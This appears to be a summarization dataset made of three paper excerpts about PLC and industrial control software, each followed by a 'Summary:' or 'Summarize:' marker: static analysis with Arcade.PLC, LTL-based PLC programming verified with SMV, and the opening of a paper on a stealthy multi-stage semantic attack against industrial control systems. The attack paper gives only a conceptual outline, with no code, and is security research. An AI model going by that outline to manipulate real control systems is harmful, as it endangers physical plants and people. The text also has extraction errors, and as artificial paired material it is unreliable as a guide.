During the adaptation of Arcade.PLC for Compact Control Builder we implemented checks for the following runtime errors and code smells:
- Conditions with constant result
- Illegal access into arrays or structured data types
- Variables with constant values
- Missing case labels in switch statements
- Unreachable code
- Division by zero
Most of these checks are based on well-known static analysis techniques, and all of them are clearly useful from an academic perspective. However, not all of these checks yielded equally usable results in practice. All of these checks rely on the capability of Arcade.PLC to approximate the possible value range of every variable in a program. Based on this information, the checks can derive further properties of a control program, e. g., that a conditional statement always yields the same result or that the value of a variable is constant. The remainder of this section will focus on the first three checks. With respect to the check for conditions yielding a constant result, the following piece of control code shows a pattern which we frequently encountered during our case study:

42 If CONDITION1 Then
43   OUTPUT := 65535;
44 ElsIf CONDITION2 Then
45   OUTPUT := INPUT1 And (INPUT2 Or (INPUT3 Xor 65535));
46 ElsIf Not CONDITION2 Then
47   OUTPUT := INPUT1 And (INPUT2 Or (INPUT3 Xor 0));
48 End_If;

Checking the condition in line 46 is obviously superfluous, as the condition in line 46 is the negation of the condition checked in line 44.
Since line 46 can only be reached if the condition in line 44 is false, its condition will always be true. A simple else-statement would thus su ce in line 46 to preserve the original semantics of the code. Nonetheless, Arcade.PLC correctly reported that the condition in line 46 yields a constant result. However, since essentially every else-statement in the projects we analyzed was written in this way, this resulted in a larger number of reported warnings, which were not realproblems in the code. Thus, we ultimately chose to deactivate the analysis for conditions with constant results to make the number of warnings manageable. In addition, Compact Control Builder programs can make use of the rmware functions GetStructComponent and PutStructComponent . They allow accessing the n-th compo- nent of a structured data type. If nis less than 1 or greater than the number of elements in the structured data type, a runtime error is signaled during program execution. It is also checked if the accessed element has the wrong type. To allow for o ine checking of correct usage of these functions, Arcade.PLC rst determines the value range of the index expression of the respective calls. This is then used to check whether there are structure elements for all possible values of the indexexpression. If this is not the the case, a warning is issued. Additionally, it is also checked if all structure elements in the range described by the index expression have the correct type. The rst check is only an adaption of a well-known array index out of bounds check to these rmware functions. The second check, however, is a domain-speci c analysis which is able to detect an additional class of runtime errors statically. Two checks for constant variables were added to Ar- cade.PLC. 
The basic version only checks whether a variable never changes its value over the execution of the program, while the more advanced version additionally checks whether the constant variable is used in a statement which should modify its value, e.g., an assignment. The first variant only indicates a stylistic issue, while the second variant usually indicates a more severe problem in the code. During our case study, we encountered one function block where both types of warnings for constant variables were triggered. The respective variables were declared as follows:

CLOCK   : time := T#1m;
COMPARE : int  := 5;

The first variable, CLOCK, is a rather typical constant containing the value 1 minute and is used as a parameter for, e.g., timers. Compact Control Builder offers the possibility to declare constants as so-called project constants, such that they are no longer variables. For projects that make use of this feature, this warning could identify further candidates that should be moved into the project constants. However, during our case study we learned that this is often deliberately not done, so that certain values can still be adjusted during commissioning of a system. For the other variable, COMPARE, the warning was triggered that this variable contains a constant value but is also written. It is only written in the following statement:

COMPARE := max(COMPARE, 2);

Since COMPARE is initialized to 5, the call to max will always return 5, which, in turn, does not change the value of the variable. The above example illustrates how the results of static analyses can interact to implement further checks: the information about the constant value of COMPARE is combined with the information that COMPARE is used in an assignment statement. Furthermore, the example also demonstrates that the software engineering practices used for the development of control applications, e.
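The advanced constant-variable check combines two analysis results, which can be sketched like this (names invented for illustration; the value ranges would come from the static analysis described earlier):

```python
# Hypothetical sketch of the advanced constant-variable check: a variable
# whose value range collapses to a single value, but which also appears as an
# assignment target, is reported as suspicious.

def written_constants(value_ranges, assigned_vars):
    """value_ranges: var -> (lo, hi) from the static analysis;
    assigned_vars: set of variables appearing as assignment targets."""
    return [v for v, (lo, hi) in value_ranges.items()
            if lo == hi and v in assigned_vars]

# COMPARE := max(COMPARE, 2) with COMPARE initialized to 5 stays at 5,
# so its range is (5, 5) although the variable is written.
ranges = {"CLOCK": (60, 60), "COMPARE": (5, 5), "INPUT1": (0, 65535)}
print(written_constants(ranges, {"COMPARE", "OUTPUT"}))  # -> ['COMPARE']
```

CLOCK is constant too, but since it is never written it would only trigger the basic, stylistic warning.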
g., using variables to store constants which can be fine-tuned during commissioning, has a significant impact on the usefulness of certain static analyses.

Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply.

V. Case Study

After adapting Arcade.PLC, we were able to successfully apply it to a real-world control project comprising multiple networked PLCs. This project consisted of roughly 20 applications and about 50,000 lines of Structured Text (ST) code. The applications are further partitioned into programs, which share access to the same set of global variables. The programs and function blocks had between 100 and 3500 lines of ST, and the programs contained up to 100 function block instances. Each of the applications had about 1000 global variables. Thus, analyzing the possible value ranges of all variables in the project was particularly challenging. Nonetheless, the complete runtime of the static analysis and the check engine on the entire project was only about 10 minutes.

The anonymized results of a sample application from this case study are shown in Tab. I:

Program          #loc  #FBs  time    #W1  #W2  #FP
App1 / Program1   233     3  <1 s      6    0    0
App2 / Program2  2776   100  11 s      0    8    0
App2 / Program3   169     5   3 s      0    0    0
App2 / Program4  2684   100  146 s     0  301    0
App2 / Program5   206    12  <1 s      0    0    0
App3 / Program6   344    12  <1 s      3    0    0
App4 / Program7  3339    18  40 s      9   50    9

TABLE I. Part of the case study with anonymized program names

The table shows the program we checked, the lines of ST code of the program (not including functions and function blocks used in the program), the number of function blocks used (#FBs), the time for running the static analysis, the number of warnings in the main program (#W1), the number of warnings in other organization units (e.g., function blocks) of the program (#W2), and the number of false positives (#FP) in #W1.
All our checks were configured in such a way that they could trigger at every location of the program, including the function blocks that are used in the program. This, however, triggered warnings in these function blocks (summarized in #W2). These warnings were raised for conditions that are always true or false, resulting in unreachable code in the function block instance. They arise because not every functionality of a function block is necessarily used in the main program. A function block might, e.g., have an input Enable to control the activation of some function. If the main program always needs this function, this input is hard-wired to true, resulting in the warning "condition is always true" at the corresponding IF Enable THEN statement in the function block due to our context-sensitive analysis. Therefore, we disabled these warnings for the function block instances used in the main program. We also disabled the warning for constant variables and only raised warnings for constant variables that are also written. After this fine-tuning, it turned out that the number of warnings and the number of false positives was reasonably low. The remaining warnings were stylistic issues, e.g., redundant compares and disabled code, which had to be inspected manually. We also found a copy&paste error in Program6, in which a wrong variable name was used in one place, causing unreachable code. In Program7, we got false positives for out-of-bounds accesses inside a loop. These false positives could be eliminated by introducing relational domains into our analysis, meaning also tracking the dependencies between variables. This is planned to be added in the future.

VI. Related Work

To the best of our knowledge, Bornot et al. [6] were the first to describe static analysis techniques for PLC programs using an abstract interpretation framework similar to the one used in Arcade.PLC. Their approach, however, is limited to small programs written in Instruction List. Prahofer et al.
[3] give an overview of different static code analysis techniques and their benefits for IEC 61131-3 programs. Their approach is concerned with detecting bad programming practices (naming conventions, program complexity, code smells, deadlocks), while our approach infers the possible values of all program variables to detect semantic programming errors. In their paper, they also give an assessment of the available commercial tools for static PLC code analysis, which, at the moment, seem to focus on syntactic checks only, e.g., compliance with certain naming conventions for variables.

VII. Conclusion

This paper reported on the adaption of an academic tool for static code analysis to a development environment for real-world control applications. After overcoming a multitude of challenges, both technical and non-technical, we were able to apply static code analysis to a large software project for an industrial control system. What we learned is that when putting theory into practice, results will not always be as expected. Not every analysis which looks useful in theory can fulfill this promise in practice. On the other hand, looking at real-world code can inspire new analyses and trigger the need to optimize existing analysis techniques. We therefore believe that applying static analysis tools to large real-world projects helps tremendously in improving these tools. Whenever possible, information about the application domain should be considered. This includes considering the end user of an analysis tool. An ideal static analysis should be useful for someone who does not understand the underlying theories. Ultimately, practical usefulness trumps ideas which only exist on paper or can only be used by an expert in the field.
Acknowledgements

This work was supported, in part, by the DFG research training group 1298 Algorithmic Synthesis of Reactive and Discrete-Continuous Systems and by the DFG Cluster of Excellence on Ultra-high Speed Information and Communication, German Research Foundation grant DFG EXC 89. Further, the work of Sebastian Biallas was supported by the DFG.
Summary:
Static code analysis techniques are a well-established tool to improve the efficiency of software developers and to check the correctness of safety-critical software components. However, their use is often limited to general-purpose or mainstream programming languages. For these languages, static code analysis has found its way into many integrated development environments and is available to a large number of software developers. In other domains, e.g., for the programming languages used to develop many industrial control applications, tools supporting sophisticated static code analysis techniques are rarely used. This paper reports on the experience of the authors while adapting static code analysis to a software development environment for engineering the control software of industrial process automation systems. The applicability of static code analysis to industrial controller code is demonstrated by a case study using a real-world control system.
|
Summarize:
I. INTRODUCTION

Using programmable logic controllers (PLCs) in systems managing complex industrial processes imposes strict correctness requirements upon the PLC programs. Any software error in a PLC program is considered inadmissible. However, the existing PLC program development tools, for instance the widely known CoDeSys (Controller Development System) package [7], merely provide the ordinary possibilities of program debugging through testing (not guaranteeing the total absence of errors) by means of visualizing the objects controlled by the PLC. At the same time, certain theoretical knowledge, along with experience of using existing designs, has been accumulated in the field of formal modeling methods and software system analysis. The programming of logic controllers is an applied field in which existing designs can be applied successfully. Successful application is understood as the introduction of formal methods into the program development process as a proven technology which is clear to all specialists involved in this process: engineers, programmers and testers. PLC programs are normally small, have a finite state space, and are exceptionally convenient objects for formal (including automatic) correctness analysis.

Programmable logic controllers are a specific type of computer used widely in modern industry (in automation systems) [9], [4]. A PLC is a reprogrammable computer connected to sensors and actuators and controlled by a user program. PLCs are highly configurable and thus are applied in various industrial sectors. They are a classic example of reactive systems. A PLC periodically repeats the execution of the user program. There are three major phases of program execution (the working cycle):
1) reading from inputs (sensors);
2) program execution;
3) writing to outputs (actuators).

Programming languages for logic controllers are defined by the IEC 61131-3 standard. This standard includes the description of five programming languages: SFC, IL, ST, LD and FBD.
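The three-phase working cycle above can be sketched as a simple loop (a toy Python illustration; the helper names are hypothetical, and real PLC runtimes read and write hardware I/O images instead):

```python
# Minimal sketch of the PLC working cycle: read inputs, run the user
# program, write outputs, repeat.

def plc_scan(read_inputs, user_program, write_outputs, state, cycles):
    for _ in range(cycles):
        inputs = read_inputs()                 # 1) read from inputs (sensors)
        outputs = user_program(inputs, state)  # 2) execute the user program
        write_outputs(outputs)                 # 3) write to outputs (actuators)

# Toy user program: a lamp follows a button.
log = []
plc_scan(read_inputs=lambda: {"button": True},
         user_program=lambda i, s: {"lamp": i["button"]},
         write_outputs=log.append,
         state={}, cycles=2)
print(log)  # -> [{'lamp': True}, {'lamp': True}]
```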
These languages make it possible to apply all existing methods of program correctness analysis, testing, theorem proving [8] and model checking [6], to the verification of PLC programs. Theorem proving is more applicable to continuous stability and regulation tasks of engineering control theory, since the implementation of these tasks on a PLC is associated with programming a relevant system of formulas. The model checking method is most suitable for discrete logic control tasks requiring a PLC with binary inputs and outputs, as this provides a finite space of possible states of the PLC program. The most convenient languages for the programming, specification and verification of PLC programs are ST, LD and SFC, as they do not present difficulties for either developers or engineers and can be easily translated into the languages of software tools for automatic verification.

Earlier, in [2], a review of methods and approaches to programming discrete PLC problems was provided based on the example of the problem of modeling a code lock control program. The usability of the model checking method for program correctness analysis was evaluated with respect to the Cadence SMV automatic verification tool [12]. Some possible PLC program vulnerabilities that surface when traditional approaches to programming are used were revealed.

This article proposes an approach to the modeling and verification of discrete PLC programs. To specify program behavior, we use the linear-time temporal logic LTL. The programming is carried out in the ST language according to the LTL specification. The correctness analysis of the LTL specification is carried out by the Cadence SMV symbolic model checking tool. We demonstrate a new approach to the programming and verification of PLC programs. A discrete problem is provided with an ST program, its LTL specification, and an SMV model.
The purpose of the article is to describe an approach to programming PLCs which would provide a possibility of PLC program correctness analysis by applying the model checking method. Further work includes building software tools for the modeling, specification, construction and verification of PLC programs.

2013 Tools & Methods of Program Analysis. 978-0-9860-7731-9/14 $31.00 © 2014 Exactpro Systems, LLC. All rights reserved. DOI 10.1109/TMPA.2013.1015

II. MODEL CHECKING. A PLC PROGRAM MODEL

Model checking is the process of verifying whether a given model (a Kripke structure) satisfies a given logical formula. The Kripke structure represents the behavior of a program; a temporal logic formula encodes a property of the program. The linear-time temporal logic (LTL) is used.

A Kripke structure over a set of atomic propositions P is a state transition system M = (S, s0, →, L), with a non-empty set of states S, an initial state s0 ∈ S, a transition relation → ⊆ S × S, which is defined for all s ∈ S, and a function L: S → 2^P labeling every state with a subset of atomic propositions. A path of the Kripke structure from the state s0 is an infinite sequence of states π = s0 s1 s2 … where si → si+1 for all i ≥ 0.

The linear-time temporal logic language is used as a specification language for the behavioral properties of a program model. A PLC is a classic reactive control system which, once running, must always exhibit the correct infinite behavior; LTL formulas allow representing this behavior. The syntax of LTL formulas is given by the following grammar, with pi ∈ P:

φ, ψ ::= true | p0 | p1 | … | pn | ¬φ | φ ∧ ψ | φ ∨ ψ | X φ | φ U ψ | F φ | G φ

An LTL formula describes the property of one path of the Kripke structure, starting from some emphasized current state.
The temporal operators X, F, G and U are interpreted as follows: X φ means that φ must hold in the next state; F φ means that φ must hold in some future state of the path; G φ means that φ must hold in the current state and all future states of the path; φ U ψ means that ψ must hold in the current or a future state, and φ must hold until that point. In addition, the classic logical operators → (implication) and ↔ (equivalence) will be used further on. A Kripke structure satisfies an LTL formula (property) φ if φ holds true for all paths starting from the initial state s0.

A Kripke model for a PLC program can be built quite naturally. As a state of the model we take the vector of values of all program variables, which can be divided into two parts. The first part is the vector of input values at the starting moment of a new PLC working cycle. The second part is the vector of output and internal variable values after a complete working cycle (on the inputs from the first part). In other words, a state of the model is the state of the PLC program after a complete working cycle. Thus, a transition from one state to another depends on the (previous) values of the outputs and internal variables of the first state and the (new) values of the inputs of the second state. For each state, the branching degree of the transition relation is determined by the number of all possible combinations of the PLC's input signals. Atomic propositions of the model are logical expressions over the PLC program variables, built using arithmetic and relational operators.

III. PROGRAMMING CONCEPT

The purpose of the article is to describe an approach to programming PLCs which would provide a possibility of PLC program correctness analysis by means of the model checking method. We will proceed from the convenience and simplicity of using the model checking method. It is necessary that the two following conditions hold true.

Condition 1. The value of each variable must not change more than once per one full run of the program during the PLC working cycle.
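The Kripke model construction above can be illustrated with a toy explicit-state sketch (Python, not Cadence SMV; all names invented). A state is a pair (inputs, outputs); successors are obtained by running one working cycle on every possible input combination, and an invariant G p can then be checked on all reachable states:

```python
# Toy illustration of the PLC Kripke model: states are (inputs, outputs)
# pairs, and the transition relation branches over all input combinations.

from itertools import product

def reachable_states(cycle, n_inputs, init_outputs):
    frontier, seen = [init_outputs], set()
    while frontier:
        outs = frontier.pop()
        for ins in product((False, True), repeat=n_inputs):
            nxt = (ins, cycle(ins, outs))
            if nxt not in seen:
                seen.add(nxt)
                frontier.append(nxt[1])
    return seen

# PLC cycle: lamp := button1 AND button2 (outputs as a 1-tuple).
cycle = lambda ins, outs: (ins[0] and ins[1],)
states = reachable_states(cycle, n_inputs=2, init_outputs=(False,))
# Invariant G(lamp -> button1): holds in every reachable state.
print(all(s[1][0] <= s[0][0] for s in states))  # -> True
```

A symbolic checker like SMV represents this state space with BDDs instead of enumerating it, but the model being checked is the same.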
Condition 2. The value of each variable must only change in one place of the program, in some operation block without nestings.

It is obvious that one run of the working cycle either increases, decreases or does not change the value of any variable. We will change a variable's value only when it is really necessary, i.e., we will forbid assigning a value to the variable if the conditions for a mandatory change of its value are not fulfilled. In this approach, the requirements for changing the value of a certain variable V after one run of the PLC working cycle are represented by the following LTL temporal logic formulas. The following LTL formula is used for describing the situations leading to an increase of the value of the V variable:

G X(V > _V → OldValCond ∧ FiringCond ∧ V = NewValExpr)   (1)

This formula means that whenever a new value of the V variable is larger than its previous value, recorded in the _V variable, it follows that the old value of the V variable satisfies the OldValCond condition, the condition of the external action FiringCond is fulfilled, and the new value of the V variable is the value of the NewValExpr expression. The leading underscore symbol _ in the _V variable is taken as a pseudo-operator. It allows referring to the value of the V variable in the previous state. The pseudo-operator can be used only within the scope of the X temporal operator. The FiringCond and OldValCond conditions are logical expressions over program variables and constants, which are constructed using comparison operators, logical and arithmetic operators and the _ pseudo-operator. By definition, the pseudo-operator can be applied only to variables. The FiringCond expression describes the situations where changing the value of the V variable is needed (if it is allowed by the OldValCond condition). The NewValExpr expression is built using variables and constants, comparison, logical and arithmetic operators and the _ pseudo-operator.
For descriptions of all possible situations increasing the value, this formula may have several conjunctive parts OldValCond_i ∧ FiringCond_i ∧ V = NewValExpr_i, combined in a disjunction after the → operator. Situations that lead to a decrease of the value of the V variable are described similarly:

G X(V < _V → OldValCond' ∧ FiringCond' ∧ V = NewValExpr')   (1')

Temporal formulas of types (1) and (1') describe the desired behavior of an integer variable. A simpler LTL formula is proposed in the case of a variable of a logical (binary) data type. The following formula describes the situations where the value of a binary variable V increases:

G X(¬_V ∧ V → FiringCond)   (2)

Situations that lead to a decrease of the value of the V variable are described similarly:

G X(_V ∧ ¬V → FiringCond')   (2')

Let us look at the special case of specifications of types (1) and (1') where for V we have FiringCond = FiringCond' = true, NewValExpr = NewValExpr', OldValCond = (_V < NewValExpr) and OldValCond' = (_V > NewValExpr):

G X(V > _V → _V < NewValExpr ∧ V = NewValExpr);
G X(V < _V → _V > NewValExpr ∧ V = NewValExpr).

Such a specification can be replaced by the following LTL formula:

G X(V = NewValExpr)   (3)

A variable V for which specifications of types (1) and (1') or (2) and (2') are built will be called a register variable. If a specification of type (3) is built, V is called a function variable. In the special case of specification (3) where the NewValExpr expression does not contain the _ leading-underscore pseudo-operator, the V variable is called a substitution variable. It is important to note that each of the LTL formula templates is constructive, i.e., by following the specification one can easily build a program that conforms to the temporal properties expressed by these formulas.
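The meaning of templates (1) and (1') can be made concrete by checking them on a finite execution trace (an illustrative Python sketch with invented names; real LTL semantics is over infinite paths, so this only examines a finite prefix):

```python
# Illustrative check of templates (1)/(1') on a finite trace. Each trace
# element is the program state after one working cycle; inc_ok/dec_ok encode
# OldValCond & FiringCond & V = NewValExpr for increase and decrease.

def check_register_var(trace, inc_ok, dec_ok):
    for prev, cur in zip(trace, trace[1:]):
        if cur["V"] > prev["V"] and not inc_ok(prev, cur):
            return False
        if cur["V"] < prev["V"] and not dec_ok(prev, cur):
            return False
    return True

# A counter that may only step up by 1 on 'up', down by 1 on 'down'.
inc = lambda p, c: c["up"] and c["V"] == p["V"] + 1
dec = lambda p, c: c["down"] and c["V"] == p["V"] - 1
trace = [{"V": 0, "up": False, "down": False},
         {"V": 1, "up": True,  "down": False},
         {"V": 0, "up": False, "down": True}]
print(check_register_var(trace, inc, dec))  # -> True
```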
Thus, we can say that PLC programming comes down to building a behavior specification for each program variable, whether it is an output or an auxiliary internal variable. The process (stage) of writing program code is completed when a specification for each such variable has been created. Note that the quantity and meaning of the output variables are defined by the PLC and the problem statement. Such an approach to PLC programming partially solves the specification completeness problem. In this case, the program specification is divided into two parts: 1) the specification of the behavior of all program variables (except inputs); 2) the specification of common program properties. The second part of the specification affects the quantity and the meaning of the internal auxiliary PLC program variables.

While building a specification, it is important to take into consideration the order of the temporal formulas describing the behavior of the variables. A certain variable without the _ pseudo-operator may be involved in the specification of another variable's behavior only if the specification of its own behavior is already completed and appears in the text above. If necessary, we will use the Init keyword to indicate a variable's initial value. For example, Init(V) = 1 means that the V variable is initially set to 1. If the initial value of some variable is not defined explicitly, it is assumed that this value is zero.

IV. PROGRAMMING BY SPECIFICATION

In this section we explore a way of building the ST code of a program according to the constructive LTL specification of the program variable behavior. In general, the translation scheme of LTL formulas into ST code is the following. Two temporal formulas for the V variable, marked V+ (value increase, (1)) and V- (value decrease, (1')), are set in conformity with the following IF-ELSIF text block in the ST language:

IF OldValCond AND FiringCond THEN
    V := NewValExpr;     (* V+ *)
ELSIF OldValCond' AND FiringCond' THEN
    V := NewValExpr';    (* V- *)
END_IF;
If the number of conjunctive blocks OldValCond_i ∧ FiringCond_i ∧ V = NewValExpr_i in the LTL formulas is more than the two considered above, then the number of alternative ELSIF branches grows (by one branch per each new block). For a binary register variable, specified by (2) and (2'), the block is:

IF NOT _V AND FiringCond THEN
    V := 1;    (* V+ *)
ELSIF _V AND FiringCond' THEN
    V := 0;    (* V- *)
END_IF;

In the case of programming the behavior of a function variable V (3), we have a simple assignment:

V := NewValExpr;    (* V *)

Each program variable must be defined in the declaration section (local or global) and initialized in accordance with the specification. Note that, for example, in the CoDeSys development environment [7] all variables are initialized to zero by default. In addition, we must implement the notion of the _ leading-underscore pseudo-operator. For this purpose, an area for a pseudo-operator section is allocated at the end of the program. In this area, an assignment _V := V is added after the description of the behavior of all specification variables. The assignment is added for each variable V whose previous value was addressed as _V. The _V variable also has to be defined in the declaration section with the same initialization as the V variable.

Note that the approach to programming by specification, which describes the reason for changing the value of each program variable, looks very natural and reasonable, because a PLC output signal is a control signal, and changing its value usually carries an additional meaning. For example, it is important to clearly understand why an engine should be turned on/off, or why some lamp must be switched on/off. Therefore, it seems quite obvious that every variable must be accompanied by two properties, one per each direction of change. It is assumed that if the conditions for a change are not fulfilled, the variable retains its previous state.

V.
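One working cycle produced by this translation, including the pseudo-operator section at the end of the program, can be simulated as follows (a Python sketch of the ST block above, not actual ST):

```python
# Sketch of one working cycle for a binary register variable, mirroring the
# IF-ELSIF translation plus the pseudo-operator section _V := V.

def cycle(state, firing_up, firing_down):
    if not state["_V"] and firing_up:      # IF NOT _V AND FiringCond THEN
        state["V"] = 1                     #     V := 1;  (* V+ *)
    elif state["_V"] and firing_down:      # ELSIF _V AND FiringCond' THEN
        state["V"] = 0                     #     V := 0;  (* V- *)
    state["_V"] = state["V"]               # pseudo-operator section: _V := V
    return state

s = {"V": 0, "_V": 0}
cycle(s, firing_up=True, firing_down=False)
print(s)  # -> {'V': 1, '_V': 1}
```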
BUILDING AN SMV MODEL BY SPECIFICATION

We consider the Cadence SMV verifier [12] as a software tool for correctness analysis by means of the model checking method. After a specification has been created, it is proposed that a Kripke structure model be built in the SMV language and that it then be verified that the common program properties are satisfied for this model. If some common program property is not true for the model, the verifier builds an example of an incorrect path in the Kripke structure model, by means of which corrections are introduced into the specification. The PLC ST program is built from the specification only after all the program properties have been verified and the verification has brought positive results.

The means of the SMV language allow defining the variable value in the next state by using the next operator. The branching of the transition relation is provided by nondeterministic assignment. For example, the assignment next(V) := {0, 1} means that states and transitions to them will be generated both with the value V = 0 and with the value V = 1. In the SMV language, the symbols &, |, ~ and -> denote logical and, or, not, and implication, respectively. The SMV language is oriented toward creating the next states of Kripke models from the current state. The initial current state of the model is the state of the program after initialization. Therefore, the specification of the behavior of the V variable, (1) and (1'), becomes easier (clearer) if rewritten in the following equivalent form:

V+: G(X(V > _V) → X(OldValCond) ∧ X(FiringCond) ∧ X(V = NewValExpr)),
V-: G(X(V < _V) → X(OldValCond') ∧ X(FiringCond') ∧ X(V = NewValExpr')).
We then get an SMV model of the V variable behavior quite naturally by putting the next operator in conformity with the temporal X operator:

case {
    next(OldValCond) & next(FiringCond) : next(V) := next(NewValExpr);
    next(OldValCond') & next(FiringCond') : next(V) := next(NewValExpr');
    default : next(V) := V;
};

The default keyword stands for what must happen by default, i.e., if the conditions of the first two branches in the case block are not true. In the case of a boolean V variable, specification (2) and (2') is converted into the following SMV model:

case {
    ~V & next(FiringCond) : next(V) := 1;
    V & next(FiringCond') : next(V) := 0;
    default : next(V) := V;
};

A model of a function-variable behavior is defined simply as

next(V) := next(NewValExpr);

Let us now consider the specification of the behavior of a substitution variable V. In this case NewValExpr does not contain the _ pseudo-operator. This allows rewriting the specification in the following equivalent form:

V: X G(V = NewValExpr).

In fact, this formula means that if the initial state of the model is not taken into account, then the equation V = NewValExpr must be true in all other states of the model. The correctness of the X G(V = NewValExpr) formula follows from the correctness of a slightly more general formula: G(V = NewValExpr). Therefore, the more general formula can be used as the constructive specification for building an SMV model of the V substitution variable. An SMV model is built from this specification simply in the form of an assignment V := NewValExpr. The Cadence SMV verifier allows checking program models containing up to 59 binary variables (in SMV, all variables are represented by sets of binary variables). The substitution variables are not included in this number, i.e., only register variables and function variables are counted.

VI.
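The semantics of the case block above, where the first branch whose guard holds determines the next value and the default branch keeps the current one, can be emulated in a few lines (an illustrative Python sketch, not SMV):

```python
# Emulation of the SMV case-block semantics: the next value of V comes from
# the first branch whose guard is true; otherwise default keeps V unchanged.

def next_v(v, branches):
    """branches: list of (guard, new_value) pairs, tried in order."""
    for guard, new_value in branches:
        if guard:
            return new_value
    return v  # default : next(V) := V;

# Boolean register variable: ~V & FiringCond sets it, V & FiringCond' clears it.
v, firing, firing_prime = 0, True, False
v = next_v(v, [((not v) and firing, 1), (v and firing_prime, 0)])
print(v)  # -> 1
```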
CONCLUSION

The approach has been successfully proven on about a dozen discrete logical control problems of different types, with an average number of binary PLC inputs and outputs of about 30 and a total number of binary program variables of up to 59. For example, in order to exclude the possibility of bad product output in a plant, PLC program properties of conformance with the technological process of mix preparation and of uninterrupted work of a hydraulic system (timely engagement of backup pumps) were verified. Also, PLC program properties of mandatory command execution for engaging an elevator cabin in a public library were tested. The verification was carried out on a PC with an Intel Core i7 2600K 3.40 GHz processor. It took the Cadence SMV verifier a mere few seconds to check the properties. Based on the results of this research, further work includes building software tools for the modeling, specification, construction, and verification of PLC programs.
Summary:
The article proposes an approach to construction and verification of PLC ST-programs for discrete problems. The linear-time temporal logic LTL is used for the specification of the program behavior. Programming is carried out in the ST (Structured Text) language, according to the LTL-specification. The correctness analysis of the LTL-specification is performed by Cadence SMV, a symbolic model checking tool. A new approach to programming and verification of PLC ST-programs is illustrated. For each discrete problem, we propose creating an ST-program, its LTL-specification, and an SMV-model.
|
Summarize:
INDEX TERMS Industrial control systems, multi-stage semantic attacks, state transition, stealthy attacks.

I. INTRODUCTION

Nowadays, industrial control systems (ICS) [1] play a quite important role in a variety of industrial processes, such as manufacturing, public facilities (e.g., buildings and airports), power generation and distribution [2]-[4], chemical processing [5], water treatment [6], oil and gas transportation [7], and large-scale communication [8]. The rapid development of Internet technology facilitates ICS in realizing remote process control and intelligent decision making. However, high exposure to open networks has made ICS an attractive target for malicious attackers [9], [10]. The summer of 2010 was a landmark for ICS security. By that time, the core control program of the Natanz uranium enrichment base in Iran had been infected by an unprecedentedly sophisticated cyber worm called ``Stuxnet''. The centrifuges for uranium enrichment were forced to accelerate unconventionally and were eventually damaged, which caused a huge loss to the entire nuclear plant. In 2015, the notorious Trojan malware ``BlackEnergy3'' attacked the Ukrainian power grid. False commands sent to relays triggered unconventional circuit disconnections, immediately followed by a large-scale blackout. At Black Hat 2017 [11], Dr. Staggs pointed out that cyber and physical attacks can easily invade programmable automation controllers and OPC (OLE for Process Control) servers by exploiting wind farm design and implementation flaws. Additionally, they designed corresponding attack tools to launch attacks on actual wind farms.

The associate editor coordinating the review of this manuscript and approving it for publication was Zhen Ling.

VOLUME 7, 2019. This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see http://creativecommons.org/licenses/by/4.0/

Y. Hu et al.: Enhanced Multi-Stage Semantic Attack Against ICS

So many ICS security
incidents indicate that ICS security has become a critical global issue [12], [13]. Intrusion detection systems (IDS) provide a promising solution for protecting ICS [14], [15]. IDS are a type of software designed to find indications that information systems have been compromised. Traditional intrusion detection technology is mainly classified into two categories: signature-based and anomaly-based. Signature-based IDS, also called misuse-based, build a blacklist containing the signatures of known attacks and raise alarms when the system behavior matches any of these signatures. Anomaly-based IDS are mainly used to detect anomalies that violate the normal behavior patterns of a target system. Therefore, a normal behavior model of the target system should be constructed; model parameters can be learnt from unaffected system operating data. When applying intrusion detection to ICS, the industrial process data (e.g., measurement data and control instructions) is another important factor to consider [16]. If the value of a process variable is outside its normal range or breaks the fundamental laws of nature, an alarm should be raised.

Existing intrusion detection technology has proved to be useful but not omnipotent. Recently, Kleinmann et al. [17] proposed a multi-stage semantic attack against ICS. This attacker can drive the target system to a critical state by reversing the semantic meaning of control instructions while presenting a fake view of the measurement data to the system operator at the same time. However, the attacker cannot guarantee that the attack goal is realized, since it just randomly chooses some instructions to reverse. In this work, we design an enhanced and strategic multi-stage semantic attack against ICS, which relies on the system state transition rules to precisely decide which control instructions to reverse.
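The idea of using state transition rules to decide which instructions to reverse can be sketched as a path search over a labeled transition graph (a hypothetical Python illustration, not the authors' implementation; the example states and instruction names are invented):

```python
# Hypothetical sketch: given a state transition graph whose edges are labeled
# with the control instruction causing each transition, choose the sequence
# of instructions that drives the system from its current state to a
# critical state (BFS for a shortest path).

from collections import deque

def attack_plan(graph, start, critical):
    """graph: state -> list of (next_state, instruction) pairs."""
    queue, seen = deque([(start, [])]), {start}
    while queue:
        state, plan = queue.popleft()
        if state == critical:
            return plan
        for nxt, instr in graph.get(state, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, plan + [instr]))
    return None  # critical state unreachable from here

g = {"idle":    [("filling", "open_valve")],
     "filling": [("idle", "close_valve"), ("overflow", "keep_valve_open")]}
print(attack_plan(g, "idle", "overflow"))  # -> ['open_valve', 'keep_valve_open']
```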
The enhanced semantic attack can significantly improve the attack success rate while maintaining its stealthiness. The key contributions of this work are summarized as follows:
- We analyze the relationships between system states and control instructions, and build a system state transition graph that can accurately characterize the dynamic behavior of ICS.
- We design an enhanced multi-stage semantic attack against ICS. By exploiting system state transition rules, the attacker can develop accurate attack strategies, which increase the attack success rate significantly.
- We launch the enhanced multi-stage semantic attack on a simulated industrial control system to verify its stronger attack ability compared to the existing semantic attack.
The rest of the paper is organized as follows. We introduce the research literature about intrusion detection in Section II. Some preliminaries of the enhanced semantic attack are presented in Section III. In Section IV, we elaborate on the principles of the enhanced multi-stage semantic attack against ICS. Experiments are conducted in Section V to verify the stronger attack ability of the enhanced multi-stage semantic attack. Finally, a conclusion is drawn in Section VI.

II. RELATED WORK
Due to the growing openness of ICS, cyber attacks against traditional information systems also threaten the security of ICS. Traditional intrusion detection technology mainly falls into two classes: signature-based and anomaly-based. The former mainly relies on accurate signatures of malicious attacks. System behavior that matches any existing attack signature is considered anomalous. On the contrary, the latter depends on a normal behavior model. Any system behavior that deviates from this model should be flagged as an anomaly. Generally speaking, attacks against ICS usually violate protocol specifications or cause abnormal network traffic, and the physical constraints of ICS are likely to be broken during an attack.
Therefore, we introduce the intrusion detection technology on ICS from three aspects: network protocol analysis, network traffic mining, and process data analysis.

A. NETWORK PROTOCOL ANALYSIS-BASED INTRUSION DETECTION
